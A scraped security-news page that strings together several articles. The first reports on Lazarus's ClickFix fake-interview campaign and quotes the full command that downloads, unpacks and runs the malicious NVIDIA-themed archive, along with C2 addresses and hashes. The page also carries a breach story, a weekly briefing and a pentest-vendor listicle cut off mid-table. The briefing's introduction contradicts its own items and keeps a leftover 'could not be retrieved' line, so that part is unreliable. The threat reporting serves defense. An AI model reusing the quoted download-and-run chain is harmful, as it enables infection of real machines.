The notorious Lazarus APT group has evolved its attack methodology by incorporating the increasingly popular ClickFix social engineering technique to distribute malware and steal sensitive intelligence data from targeted organizations.
This North Korean-linked threat actor, internally tracked as APT-Q-1 by security researchers, has demonstrated remarkable adaptability by integrating deceptive user interface manipulation with their traditional espionage operations.
The ClickFix technique represents a sophisticated social engineering approach where attackers present victims with fabricated technical issues, then guide them through seemingly legitimate “fixes” that actually execute malicious code.
Lazarus has weaponized this method within their established fake recruitment campaign infrastructure, creating a multi-layered attack vector that combines job opportunity lures with technical deception.
CN-SEC analysts identified this campaign through the discovery of a malicious batch script that downloads disguised NVIDIA software packages, which subsequently deploy the group’s signature BeaverTail information stealer.
The attack chain begins when victims are lured to fraudulent interview websites that prompt them to prepare their interview environment, eventually claiming camera configuration issues require immediate resolution.
Phishing operation (Source – CN-SEC)
The technical sophistication of this operation extends beyond simple social engineering. Victims are presented with what appears to be a legitimate NVIDIA driver update command, but the underlying payload morphs into a malicious execution sequence.
The primary infection vector utilizes a PowerShell command that downloads and extracts a malicious ZIP archive from compromised infrastructure.
Recent analysis reveals that the group has expanded operations to target both Windows and macOS platforms, demonstrating cross-platform capabilities through tailored payloads for different operating system architectures.
The Windows variant focuses on enterprise environments through Node.js-based deployment mechanisms, while macOS versions utilize shell scripts designed for Apple Silicon and Intel processors.
Malware Deployment and Persistence Mechanisms
The core malware package, distributed as “nvidiaRelease[.]zip” (MD5: f9e18687a38e968811b93351e9fca089), contains multiple components designed for cross-platform compatibility and persistent access.
nvidiaRelease.zip contents (Source – CN-SEC)
The initial ClickFix-1.bat script executes the following command sequence:-
curl - k - o "%TEMP%\\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\\nvidiaRelease'" && cscript "%TEMP%\\nvidiaRelease\\run[.]vbs"
The extracted archive deploys run[.]vbs, which performs system reconnaissance to determine the Windows build number.
For Windows 11 systems (build 22000 or higher), the script additionally executes drvUpdate[.]exe, a sophisticated backdoor capable of command execution and file manipulation.
This binary establishes communication with command-and-control servers at 103.231.75.101:8888, implementing functions including system information collection, remote command execution, and file transfer capabilities.
Core Malware Components:-
Component
MD5 Hash
Function
ClickFix-1[.]bat
a4e58b91531d199f268c5ea02c7bf456
Initial payload downloader
nvidiaRelease[.]zip
f9e18687a38e968811b93351e9fca089
Malicious archive package
run[.]vbs
3ef7717c8bcb26396fc50ed92e812d13
System reconnaissance script
main.[]js (BeaverTail)
b52e105bd040bda6639e958f7d9e3090
Cross-platform information stealer
drvUpdate[.]exe
6175efd148a89ca61b6835c77acc7a8d
Windows 11 backdoor
The malware achieves persistence through registry modification, adding an entry to the Windows startup registry key that ensures execution across system reboots.
The BeaverTail component communicates with infrastructure at 45.159.248.110, demonstrating redundant command-and-control capabilities for maintaining long-term access to compromised systems.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Cybercriminals have escalated their attacks against macOS users by deploying a sophisticated new campaign that leverages a fraudulent Microsoft Teams download site to distribute the dangerous Odyssey stealer malware. This development represents a significant evolution from earlier attacks that primarily targeted users through fake trading platforms. The malicious campaign first came to light in early […]
Tenable has confirmed a data breach that exposed the contact details and support case information of some of its customers.
The company stated the incident is part of a broader data theft campaign targeting an integration between Salesforce and the Salesloft Drift marketing application, which has affected numerous organizations.
In a public statement, Tenable expressed its commitment to transparency and detailed the extent of the breach. The company’s investigation found that an unauthorized user had gained access to a segment of customer information stored within its Salesforce instance.
While Tenable’s core products and the data within them remain secure, the incident has raised concerns about the security of third-party application integrations within major business platforms.
Exposed Data
The information accessed by the unauthorized party was limited to data within Tenable’s Salesforce environment. This included:
Commonly available business contact information, such as customer names, business email addresses, and phone numbers.
Regional and location references associated with customer accounts.
Subject lines and initial descriptions that customers provided when opening a support case.
Tenable has noted that at this time, there is no evidence to suggest that the attackers have actively misused any of this information.
The breach at Tenable was not an isolated attack but is linked to a wider, sophisticated campaign that security experts have been tracking. This campaign specifically exploits a vulnerability in the integration between Salesforce and Salesloft Drift, a popular sales engagement platform.
Attackers have been using this vector to exfiltrate data from the Salesforce instances of various companies that use the integrated applications. Tenable confirmed it was one of many organizations impacted by this coordinated effort.
Tenable’s Response and Mitigation
Upon discovering the incident, Tenable took immediate action to secure its systems and protect customer data. The company has outlined several steps it has taken to address the issue:
All potentially compromised credentials for Salesforce, Drift, and related integrations were promptly revoked and rotated.
The Salesloft Drift application, along with all applications that integrated with it, was disabled and removed from Tenable’s Salesforce instance.
The company has further hardened its Salesforce environment and other connected systems to prevent future exploitation.
Tenable applied known Indicators of Compromise (IoCs) shared by Salesforce and cybersecurity experts to identify and block malicious activity.
Continuous monitoring of its Salesforce and other SaaS solutions is ongoing to detect any exposures or unusual activity.
Tenable is advising its customers to remain vigilant and has recommended that they follow the proactive steps outlined by Salesforce and leading security experts to secure their own systems.
Confirmed victims of this supply chain attack include:
Palo Alto Networks: The cybersecurity firm confirmed the exposure of business contact information and internal sales data from its CRM platform.
Zscaler: The cloud security company reported that customer information, including names, contact details, and some support case content, was accessed.
Google: In addition to being an investigator, Google confirmed a “very small number” of its Workspace accounts were accessed through the compromised tokens.
Cloudflare: Cloudflare has confirmed a data breach where a sophisticated threat actor accessed and stole customer data from the company’s Salesforce instance.
PagerDuty has confirmed a security incident that resulted in unauthorized access to some of its data stored in Salesforce.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A sophisticated new malware campaign exploiting trusted platforms and hardware-dependent evasion techniques targets IT professionals across Western Europe. Cybersecurity researchers have uncovered a highly sophisticated malware distribution campaign that cleverly exploits Google Ads and GitHub’s infrastructure to deliver a novel payload dubbed “GPUGate.” The campaign, first identified by Arctic Wolf’s Cybersecurity Operations Center on August […]
CISA has issued an urgent warning about a newly discovered zero-day vulnerability in WhatsApp that is already being exploited in active attacks. The flaw, tracked as CVE-2025-55177, poses a significant risk to users worldwide, particularly as ransomware operators and other cybercriminals seek to take advantage of the weakness in device synchronization processes. On September 2, […]
Security researchers uncovered a large-scale attack campaign now identified as GhostAction, which compromised secrets belonging to 327 GitHub users and impacted 817 repositories. The incident began with the discovery of a malicious workflow embedded in the widely used FastUUID project. The attack was first spotted when GitGuardian detected a suspicious GitHub workflow commit titled “Add Github Actions Security workflow” pushed by the account Grommash9 on […]
A major security flaw has been discovered in Argo CD, a popular open-source tool used for Kubernetes GitOps deployments. The vulnerability allows project-level API tokens to expose sensitive repository credentials, such as usernames and passwords, to attackers. The issue has been classified as critical with a CVSS score of 9.8/10 and is tracked as CVE-2025-55190. The […]
Canadian financial technology company Wealthsimple disclosed a data security incident on September 5, 2025, revealing that personal information belonging to less than one percent of its clients was accessed without authorization. The breach, which was detected on August 30, has prompted the company to implement enhanced security measures and offer comprehensive support to affected customers. […]
Welcome to your weekly cybersecurity briefing. In a digital landscape where the only constant is change, this past week has been a stark reminder that vigilance is not just a best practice, but a necessity for survival.
From corporate giants making strategic moves to protect the cloud to sophisticated threat actors breaching the defenses of iconic brands, the cyber battleground remains as active as ever, demanding our full attention.
This week, Palo Alto Networks made headlines by releasing an emergency patch for a critical zero-day vulnerability discovered in its PAN-OS software, affecting its GlobalProtect gateways. The vulnerability allowed for unauthenticated remote code execution, sending ripples of urgency throughout the industry as IT teams scrambled to apply the fix.
Our deep dive explores the technical specifics of this exploit, the rapid response from Palo Alto’s Unit 42, and the immediate steps security teams must take to mitigate this significant threat before it can be widely exploited in the wild.
On the proactive front, Zscaler countered the growing threat of AI-driven phishing attacks by unveiling a new suite of features for its Zero Trust Exchange. Their latest research report, also released this week, highlights a substantial increase in sophisticated, context-aware phishing emails over the last quarter.
We will break down how Zscaler’s new AI-powered capabilities aim to detect and block these evasive threats in real-time, offering a new layer of defense in the fight against social engineering and credential theft.
In a significant blow to the automotive sector, Jaguar Land Rover (JLR) confirmed it suffered a major data breach. The incident resulted in the exfiltration of sensitive employee data and internal engineering documents.
While JLR has stated that customer financial information was not compromised, the breach raises serious questions about supply chain security and the protection of intellectual property within the manufacturing industry. We will analyze the attack vector, the potential fallout for JLR, and the lessons other organizations in the sector must learn from this high-profile incident.
Beyond these major stories, we are also tracking a surge in DDoS attacks targeting financial institutions and new warnings from CISA about state-sponsored actors targeting critical infrastructure. In this edition, we provide in-depth analysis of each of these events, offering expert commentary and actionable insights to help you fortify your organization’s defenses.
Threats
Hackers Exploit Email Marketing Services for Phishing
Cybercriminals are increasingly using legitimate email marketing platforms to bypass security filters and deliver malicious content. By leveraging the trusted domains of these services, attackers can disguise phishing attempts and increase the likelihood of their emails reaching inboxes. These campaigns often use the platform’s own click-tracking and URL redirection features to send users to harmful websites after they click on a seemingly safe link. One notable incident involved a data breach at Mailchimp, where hackers gained access to customer accounts and data. Read More
macOS Security Features Turned Against Users
A sophisticated attack trend involves exploiting macOS’s built-in security features to spread malware. Attackers are finding ways to abuse tools like Keychain for credential theft, bypass System Integrity Protection (SIP) for persistent infections, and trick users into granting permissions through Transparency, Consent, and Control (TCC). Other features being manipulated include Gatekeeper, which verifies downloaded apps, and File Quarantine, which flags files from the internet. Read More
Commercial Spyware Vendors Are a Major Source of Exploits
A report from Google’s Threat Analysis Group (TAG) highlights the significant role of commercial spyware vendors in the creation and distribution of sophisticated surveillance tools. These companies are responsible for a large number of 0-day exploits that target products from companies like Google and Apple. The report notes that the private sector is now a major player in developing some of the most advanced cyber capabilities, selling them as “turnkey espionage solutions” to government customers. Read More
New “TinyLoader” Malware Targets Windows Systems
A stealthy malware loader known as TinyLoader is actively targeting Windows users. It spreads through shared network drives and deceptive shortcut files, acting as an initial access point for more dangerous malware such as RedLine Stealer and DCRat. TinyLoader can move laterally across networks and also infect systems via removable media like USB drives. Once it gains administrator rights, it can hijack file associations to ensure it runs every time a user opens a common file type, like a .txt file. Read More
“NotDoor” Backdoor Deployed Through Outlook
The Russian state-sponsored group APT28 (also known as Fancy Bear) is using a new backdoor called “NotDoor” to target organizations through Microsoft Outlook. The malware is disguised within legitimate Outlook macros and can exfiltrate data, upload files, and execute commands on an infected system. It achieves persistence by modifying Outlook’s registry settings to disable security warnings and enable macros to run on startup. Read More
“GhostRedirector” Manipulates Search Results via IIS
A hacking group dubbed “GhostRedirector” has been compromising Windows servers to manipulate search engine results for financial benefit. The attackers deploy a malicious module for Microsoft’s Internet Information Services (IIS) web server. This allows them to intercept and redirect web traffic or inject unwanted content into search results. The malicious module can be difficult to detect as it integrates deeply with the server’s legitimate functions. Read More
Fake Microsoft Teams Sites Used to Distribute Malware
Threat actors are weaponizing fake Microsoft Teams websites and even initiating Teams calls to trick users into installing malware. In some cases, attackers impersonate IT support staff during calls to convince victims to execute malicious PowerShell commands, leading to the deployment of ransomware. Another campaign uses a fake Teams site to distribute the “Odyssey” information-stealing malware for macOS. Read More
“GPUGate” Malware Leverages Google Ads and GPUs
A sophisticated malware campaign named “GPUGate” is abusing Google Ads and GitHub to deliver malware. The attack begins with malicious ads in Google search results for terms like “GitHub Desktop”. A novel aspect of this attack is its use of the computer’s Graphics Processing Unit (GPU) to perform certain operations, which helps it evade detection by security software that primarily focuses on the CPU. Read More
Cyber Attacks
Record-Breaking 11.5 Tbps DDoS Attack Hits the Web
A massive UDP flood Distributed Denial-of-Service (DDoS) attack has been recorded, reaching an unprecedented 11.5 terabits per second (Tbps). This attack highlights the escalating scale of DDoS threats facing organizations. Read More
Hackers Weaponize Hexstrike-AI to Exploit Zero-Day Flaws
Threat actors are now leveraging a new AI-powered offensive security framework named Hexstrike-AI. The tool is being used to automatically scan for and exploit previously unknown “zero-day” vulnerabilities, significantly speeding up the attack process. Read More
“Dire Wolf” Ransomware Emerges with Double Extortion Tactics
A new and sophisticated ransomware strain, dubbed “Dire Wolf,” has impacted 16 firms across the globe since May 2025. This ransomware employs double extortion methods, advanced encryption, and anti-recovery tactics to pressure victims into paying. Read More
Colombian Threat Actors Use SWF and SVG Files to Evade Detection
A malware campaign originating from Colombia is using a multiphase attack that leverages Adobe Flash (SWF) and Scalable Vector Graphics (SVG) file formats. This technique allows the attackers to bypass traditional security detection measures. Read More
AI Platforms Exploited in Microsoft 365 Phishing Campaigns
Cybercriminals are increasingly taking advantage of the trust that organizations place in artificial intelligence platforms. These platforms are being used in sophisticated phishing campaigns to steal Microsoft 365 credentials. Read More
NightshadeC2 Botnet Employs “UAC Prompt Bombing”
A new botnet, identified as NightshadeC2, has been observed using a novel technique called “UAC Prompt Bombing.” This method allows it to bypass Windows Defender security measures and was first seen in early August 2025. Read More
Critical SAP S/4HANA Vulnerability Under Active Exploitation
A critical security flaw in SAP S/4HANA is being actively exploited by attackers. The vulnerability allows individuals with low-level user access to escalate their privileges and gain full control over the affected SAP systems. Read More
Vulnerabilities
MediaTek Patches Dozens of Chipset Flaws
MediaTek released its September 2025 security bulletin, addressing multiple high and medium-severity vulnerabilities across more than 60 chipsets. The flaws, found in modem and firmware components, could lead to denial-of-service attacks or remote privilege escalation if exploited. The vulnerabilities include out-of-bounds writes, out-of-bounds reads, and use-after-free bugs. MediaTek confirmed that device manufacturers received the patches in July and there is no evidence of these vulnerabilities being exploited in the wild. Read more
Critical Next.js Flaw Allows Authorization Bypass
A critical vulnerability, CVE-2025-29927, has been discovered in the popular Next.js web development framework. The flaw allows attackers to bypass authorization mechanisms and gain access to restricted areas, such as admin panels. By manipulating the x-middleware-subrequest header, an attacker can trick an application into skipping security checks. Vercel, the company behind Next.js, has released patches to address the issue, which is estimated to affect over 300,000 services. Read more
Azure Active Directory Flaw Exposes Sensitive Credentials
A significant vulnerability in Azure Active Directory (Azure AD) configurations allows for the exposure of application credentials, such as ClientId ClientSecret. Attackers who obtain these credentials can impersonate trusted applications, access sensitive data across Microsoft 365 services like SharePoint and OneDrive, and even deploy malicious apps to establish persistent backdoors. The issue stems from credentials being inadvertently exposed in configuration files. Read more
MobSF Security Tool Vulnerable to Malicious File Uploads
A critical flaw (CVE-2023-37576) was discovered in the Mobile Security Framework (MobSF), a widely used open-source tool for mobile app security testing. The vulnerability, found in version 4.4.0, was due to improper path validation, which allowed authenticated attackers to upload and execute malicious files on the system running MobSF. This path traversal vulnerability could turn the security tool into a vector for system compromise. The issue has since been patched. Read more
PoC Exploit Released for IIS Remote Code Execution Flaw
A proof-of-concept (PoC) exploit has been released for a critical remote code execution (RCE) vulnerability (CVE-2025-53772) in Microsoft’s Internet Information Services (IIS) Web Deploy tool. The vulnerability is caused by the unsafe deserialization of HTTP header content, allowing an authenticated attacker to execute arbitrary code. This follows other campaigns targeting older IIS vulnerabilities, such as a buffer overflow flaw (CVE-2017-7269) in IIS 6.0 that was used to install cryptocurrency miners. Read more
CISA Warns of Actively Exploited WhatsApp Zero-Day
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a zero-day vulnerability in WhatsApp (CVE-2025-55177) that is being actively exploited. The flaw, categorized as an incorrect authorization issue, allows attackers to manipulate the device synchronization process to send malicious content from a controlled URL. This could lead to data theft or device compromise, potentially through zero-click attacks. The vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches. Read more
Google Releases Chrome 140 With Key Security Fixes
Google has rolled out Chrome 140, which includes patches for six security vulnerabilities. The fixes address medium-severity flaws in components like the Toolbar (CVE-2025-9865), Extensions (CVE-2025-9866), and Downloads (CVE-2025-9867). These vulnerabilities could have led to unexpected browser behavior or security risks like privilege escalation. The update was released for Windows, macOS, and Linux. Read more
New “Namespace Reuse” Vulnerability Hits Major AI Platforms
A novel AI supply-chain attack method called “Model Namespace Reuse” has been discovered, affecting platforms like Microsoft Azure AI, Google Vertex AI, and Hugging Face. The vulnerability allows attackers to upload a malicious AI model using the same name as a legitimate but deleted or abandoned one. When a project attempts to pull the model by name, it inadvertently downloads the malicious version, leading to remote code execution (RCE) in the victim’s environment. Read more
Sitecore Zero-Day Vulnerability
Information regarding the “Sitecore zero-day vulnerability” from the provided link could not be retrieved at this time. Read more
Data Breach
Palo Alto Networks, Zscaler, Cloudflare, and PagerDuty Hit by Supply Chain Attack
A sophisticated supply chain attack targeting the Salesloft Drift application has impacted several major technology companies, including Palo Alto Networks, Zscaler, Cloudflare, and PagerDuty. The attackers exploited compromised OAuth tokens to gain unauthorized access to the companies’ Salesforce customer relationship management (CRM) environments and exfiltrate data.
Palo Alto Networks confirmed that the incident was isolated to its CRM platform, and no company products or services were affected. The breach exposed business contact information and internal sales data. Read More
Zscaler also confirmed a data breach affecting customer data stored in Salesforce, including names, email addresses, and phone numbers. Zscaler has stated that its own products and infrastructure were not compromised. Read More
Cloudflare disclosed that the attackers accessed customer support case data between August 12 and August 17, 2025. The company warned that any sensitive information shared by customers in support tickets should be considered compromised. Read More
PagerDuty reported that the breach exposed customer contact information stored in its Salesforce instance. The company has found no evidence that its own platform or internal systems were accessed. Read More
Jaguar Land Rover Halts Production After Cyberattack
Luxury car manufacturer Jaguar Land Rover (JLR) was forced to halt production at its Halewood plant after a significant cybersecurity incident that impacted its global IT systems. The attack, which took place in early September 2025, caused severe disruptions to the company’s manufacturing operations. A group of hackers known as “Scattered Lapsus$ Hunters” has claimed responsibility for the attack. Read More
Bridgestone Manufacturing Disrupted by Cyberattack
Tire giant Bridgestone confirmed that a cyberattack in early September 2025 affected some of its manufacturing facilities in North America, leading to operational disruptions. The company stated that it responded quickly to contain the incident and believes no customer data was compromised. The full extent of the impact on the supply chain is still being investigated. Read More
Wealthsimple Discloses Customer Data Breach
Canadian financial services firm Wealthsimple announced that it suffered a data breach in late August 2025, resulting in unauthorized access to the personal information of a small percentage of its clients. The company has assured customers that their funds and account passwords remain secure. The breach was caused by a compromised third-party software package. Read More
Other News
Salesforce Bolsters Security with New Forensic Investigation Guide
Salesforce has released a comprehensive forensic investigation guide to help organizations detect, analyze, and respond to security incidents within their environments. The guide focuses on three core pillars for a thorough investigation: analyzing activity logs to track user actions, understanding user permissions to determine the potential impact of a breach, and utilizing backup data to identify data tampering. This initiative aims to provide a structured framework for companies to manage cyber incidents more effectively, especially after a series of sophisticated cyber campaigns. The guide highlights tools like Login History, Setup Audit Trail, and Event Monitoring to gain visibility into user activities. Read More
Wireshark Releases Version 4.4.9 with Critical Bug Fixes
The Wireshark team has launched version 4.4.9, a maintenance release focused on improving stability and reliability. This update for the popular network protocol analyzer addresses several critical bugs, including a security vulnerability in the SSH dissector that could cause the application to crash. The new version also includes updated support for various protocols and ensures a more stable experience for users, leading to more efficient network analysis. Read More
Nmap Celebrates 28 Years of Network Security Innovation
Nmap, the renowned network scanner, recently marked its 28th anniversary. Launched on September 1, 1997, as a simple port scanner, Nmap has evolved into an essential and comprehensive network security suite used by professionals worldwide. Over the years, it has incorporated advanced features like operating system and service version detection, the Nmap Scripting Engine (NSE) for automated tasks, and sophisticated host discovery techniques. Its continuous evolution has solidified its place as a critical tool for network discovery and security auditing. Read More
Microsoft to Discontinue Editor Browser Extensions
Microsoft has announced the retirement of its Editor browser extensions for both Edge and Chrome, effective October 31, 2025. The company plans to integrate the AI-powered writing assistance features, such as grammar and spelling checks, directly into the native proofing tools of the Microsoft Edge browser. This move is intended to streamline the user experience and eliminate the need for a separate extension. Read More
Mis-Issued TLS Certificates for 1.1.1.1 DNS Service Pose Security Risk
A potential security threat has emerged after it was discovered that three TLS certificates for the 1.1.1.1 DNS service, operated by Cloudflare and APNIC, were mis-issued. The certificates were issued in May 2025 by a subordinate certificate authority but were not discovered until four months later. DNS over TLS (DoT) is a protocol that encrypts DNS queries to prevent eavesdropping and tampering, and the mis-issuance of certificates could undermine this security measure. Read More
Google Services Experience Widespread Outages
Several Google services, including Gmail and YouTube, experienced significant outages across parts of Europe and some U.S. cities on Thursday morning. Monitoring sites reported a surge in complaints from countries like Greece, Bulgaria, Serbia, and Romania. The disruptions affected both personal and professional activities for many users. The cause of the outage has not yet been publicly disclosed by Google. Read More
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
As more businesses migrate their infrastructure to the cloud, cloud penetration testing has become a critical service.
Unlike traditional network tests, cloud pentesting focuses on unique attack vectors such as misconfigured services, insecure APIs, and overly permissive IAM (Identity and Access Management) policies.
In 2025, the best companies in this field combine deep knowledge of cloud-native vulnerabilities with a flexible, platform-driven approach to provide continuous, actionable security insights.
Why We Choose It
Cloud environments, particularly multi-cloud setups, present a complex security challenge.
Misconfigurations are the leading cause of cloud security breaches, and automated scanners often miss the subtle, exploitable flaws in how services are connected or configured.
Cloud penetration testing goes beyond automated scans by simulating a real-world attacker’s mindset.
Expert pentesters exploit weaknesses in Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure, uncovering critical vulnerabilities that could lead to data theft, service disruption, or unauthorized access.
How We Choose The Best Cloud Penetration Testing Companies in 2025
We selected the top cloud penetration testing companies for 2025 based on three key criteria:
Experience & Expertise (E-E): We looked for companies with a proven track record, a deep understanding of cloud service provider (CSP) nuances, and a history of discovering and responsibly disclosing cloud vulnerabilities.
Authoritativeness & Trustworthiness (A-T): We considered market leadership, industry recognition, and the reputation of their offensive security teams.
Feature-Richness: We assessed the comprehensiveness of their platforms and services, looking for capabilities in:
CSP-Specific Expertise: The ability to test for vulnerabilities unique to AWS, Azure, and GCP.
Continuous Testing: A platform or service model that allows for ongoing security validation as the cloud environment changes.
Advanced Reconnaissance: The capability to discover all publicly exposed cloud assets.
Actionable Reporting: Clear, prioritized reports with detailed remediation guidance and re-testing options.
Top 10 Best Cloud Penetration Testing Companies in 2025
NetSPI
Bishop Fox
Synack
Rhino Security Labs
Astra Security
Praetorian
Coalfire
Pentera Cloud
TrustedSec
Cobalt.io
1. NetSPI
NetSPI
NetSPI is a leader in cloud penetration testing, distinguished by its PTaaS (Penetration Testing as a Service) platform, Resolve.
Its team of experts specializes in finding vulnerabilities in multi-cloud environments, including misconfigurations, overly permissive access, and flaws in container security.
NetSPI’s platform provides real-time visibility into findings, making the entire testing process more efficient and collaborative.
The company’s work with 9 out of 10 of the top banks in the US and the largest cloud providers highlights their trusted expertise.
Why You Want to Buy It:
NetSPI’s Resolve platform streamlines the entire pentest workflow, from scoping to remediation. This makes it an ideal choice for organizations that need to centralize their security findings and measure progress over time.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Specialists in AWS, Azure, and GCP.
Continuous Testing
Yes
PTaaS model with continuous testing and real-time findings.
Advanced Reconnaissance
Yes
Comprehensive external asset discovery.
Actionable Reporting
Yes
In-platform collaboration and detailed reports.
Best For: Large enterprises that need a scalable, continuous, and platform-driven approach to cloud security.
Bishop Fox is a top-tier offensive security firm with a strong reputation for its Cloud Penetration Testing services.
The company’s team of highly creative and technical experts, known as “The Fox,” uses cutting-edge, proprietary and open-source tools to simulate real-world attacks.
They excel at identifying complex misconfigurations and attack pathways, providing a truly realistic assessment of an organization’s cloud defenses.
Why You Want to Buy It:
Bishop Fox’s expertise is unmatched. Their testers go beyond standard checks to find sophisticated vulnerabilities that automated tools and less-experienced firms would miss.
They provide insights into the most critical and exploitable attack paths.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Deep expertise across all major CSPs.
Continuous Testing
Yes
Offers a continuous attack surface testing (CAST) model.
Advanced Reconnaissance
Yes
In-depth discovery of cloud-related attack paths.
Actionable Reporting
Yes
Tailored executive and technical reports with prioritized findings.
Best For: Organizations that need a highly customized and technically deep-dive cloud security assessment from one of the most respected offensive security firms.
Synack pioneered the PTaaS model and applies its crowdsourced approach to cloud security.
The company can deploy a diverse community of vetted ethical hackers to test cloud environments, providing broader coverage and finding more vulnerabilities in less time than a small, static team.
Synack’s platform can integrate with AWS, Azure, and GCP to automatically detect changes and launch on-demand tests, making it a highly agile solution.
Why You Want to Buy It:
Synack’s model offers unparalleled scalability and speed. The ability to have multiple researchers from around the world testing your cloud environment simultaneously provides a comprehensive, 24/7 security posture.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Integrations with AWS, Azure, and GCP.
Continuous Testing
Yes
On-demand and continuous testing via the Synack Platform.
Advanced Reconnaissance
Yes
Continuous asset discovery with AI-powered validation.
Actionable Reporting
Yes
Real-time reporting and patch verification on the platform.
Best For: Companies that need continuous, on-demand cloud testing and want to leverage the power of a vast, crowdsourced community of elite hackers.
Rhino Security Labs is a highly specialized cloud penetration testing company, widely recognized for its deep expertise in AWS, Azure, and GCP.
The company’s research team has a history of discovering and publishing high-profile cloud vulnerabilities and tools, such as the Pacu cloud exploitation framework.
This research-driven approach ensures that their tests are always up-to-date with the latest attack techniques.
Why You Want to Buy It:
Rhino Security Labs’ services are based on a foundation of cutting-edge research, meaning they’ll uncover vulnerabilities that are not yet widely known.
They are experts in attacking the cloud from the perspective of a sophisticated threat actor.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Core specialization in AWS, Azure, and GCP.
Continuous Testing
No
Focuses on traditional, time-boxed engagements.
Advanced Reconnaissance
Yes
In-depth cloud asset enumeration.
Actionable Reporting
Yes
Detailed reports with clear remediation guidance.
Best For: Organizations with complex cloud environments that want to work with a firm known for its deep technical expertise and contributions to cloud security research.
Astra Security offers a comprehensive Cloud Pentest Suite that combines automated scanning with expert human analysis.
The company’s platform runs over 13,000 automated security tests and compliance checks, which are then validated by human pentesters.
This hybrid approach ensures both the speed of automation and the depth of human expertise, making it a highly efficient solution for continuous cloud security.
Why You Want to Buy It:
Astra’s blend of automation and manual testing makes it a cost-effective and efficient way to secure your cloud assets.
The platform simplifies vulnerability management and provides clear, developer-friendly reports to speed up remediation.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Supports AWS, Azure, and GCP.
Continuous Testing
Yes
PTaaS platform with continuous vulnerability scanning.
Advanced Reconnaissance
Yes
Discovers and maps cloud infrastructure.
Actionable Reporting
Yes
Detailed reports with step-by-step remediation advice.
Best For: Small to medium-sized businesses and agile development teams that need a fast, affordable, and continuous cloud security solution.
Praetorian is an offensive cybersecurity company that provides expert-led cloud penetration testing services. They use an adversarial mindset to help organizations prioritize and reduce material risks in their cloud environments.
Praetorian’s services are designed to go beyond simple compliance, focusing on uncovering exploitable vulnerabilities that are most likely to be leveraged by real-world attackers.
The company also offers Continuous Threat Exposure Management (CTEM) to maintain security over time.
Why You Want to Buy It:
Praetorian’s unique approach helps you optimize your security budget by focusing on the vulnerabilities that pose the greatest risk.
Their expertise ensures that you’re not just finding flaws but understanding their potential impact on your business.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Strong expertise across all major CSPs.
Continuous Testing
Yes
CTEM services for continuous security validation.
Advanced Reconnaissance
Yes
Identifies external attack surface and exploitable entry points.
Actionable Reporting
Yes
Provides insights on material risk and strategic recommendations.
Best For: Enterprises that want a strategic partner for offensive security, focusing on real-world risk reduction rather than just compliance.
Coalfire is a cybersecurity services firm with a strong focus on compliance, particularly for FedRAMP, PCI, and SOC 2.
Its cloud penetration testing services are tailored to help organizations meet these stringent regulatory requirements while also strengthening their security posture.
Coalfire’s experts assess cloud configurations, network segmentation, and application security to ensure that both technical and compliance standards are met.
Why You Want to Buy It:
Coalfire’s deep expertise in compliance and its history of working with federal and highly-regulated clients makes it an ideal partner for businesses that need to demonstrate their cloud security posture to auditors and regulators.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Expertise in cloud security for various compliance frameworks.
Continuous Testing
Yes
Offers continuous testing as part of its managed services.
Advanced Reconnaissance
Yes
In-depth cloud asset discovery.
Actionable Reporting
Yes
Detailed reports with a strong focus on compliance requirements.
Best For: Organizations in highly regulated industries that need a cloud penetration test that meets strict compliance standards.
Pentera Cloud offers a unique, automated security validation and one of the core cloud penetration testing companies platform that simulates cloud-native attacks.
Unlike manual penetration testing, Pentera’s solution continuously challenges an organization’s cloud environment, finding exploitable misconfigurations and attack paths without the need for human intervention.
The platform provides a hybrid test, identifying attack vectors that extend across both cloud and on-premises environments.
Why You Want to Buy It:
Pentera Cloud provides a continuous, always-on security assessment, making it an excellent tool for organizations with rapidly changing cloud environments.
Its ability to find exploitable kill-chains between on-premises and cloud systems is a key advantage.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Automated testing for cloud-native vulnerabilities.
Continuous Testing
Yes
Continuous security validation and attack emulation.
Advanced Reconnaissance
Yes
Maps cloud workloads, databases, and identities.
Actionable Reporting
Yes
Evidence-based remediation reports.
Best For: Organizations that need to continuously validate their cloud security controls with an automated, hybrid approach.
TrustedSec is a well-regarded cybersecurity consulting firm known for its expert-led, hands-on penetration testing services.
Their approach to cloud security is highly customized, with consultants simulating real-world cyberattacks on AWS, Azure, and GCP environments.
TrustedSec is renowned for its detailed reporting and a strong focus on providing clear, prioritized remediation guidance.
Why You Want to Buy It:
TrustedSec’s reputation is built on the expertise of its consultants. If you want a thorough, hands-on assessment from a firm that prioritizes a deep understanding of your unique environment, TrustedSec is an excellent choice.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Specialists in AWS, Azure, and GCP.
Continuous Testing
No
Focuses on traditional, project-based engagements.
Advanced Reconnaissance
Yes
Conducts extensive cloud asset enumeration.
Actionable Reporting
Yes
Detailed, technical reports with remediation advice.
Best For: Companies that value a personalized, white-glove service from a team of highly-skilled and ethical hackers.
Cobalt.io is a pioneer of the PTaaS model, offering a platform that connects businesses with a global community of vetted security researchers.
For cloud penetration testing, Cobalt’s platform enables organizations to quickly scope and launch engagements, providing access to specialized talent and accelerating the testing process.
The platform centralizes all findings, making it easy to manage and track vulnerabilities.
Why You Want to Buy It:
Cobalt’s platform and crowdsourced model allow you to launch a cloud pentest in days, not months.
The platform’s streamlined workflow and on-demand access to talent make it an efficient way to integrate security into your development lifecycle.
Feature
Yes/No
Specification
CSP-Specific Expertise
Yes
Offers network & cloud security testing.
Continuous Testing
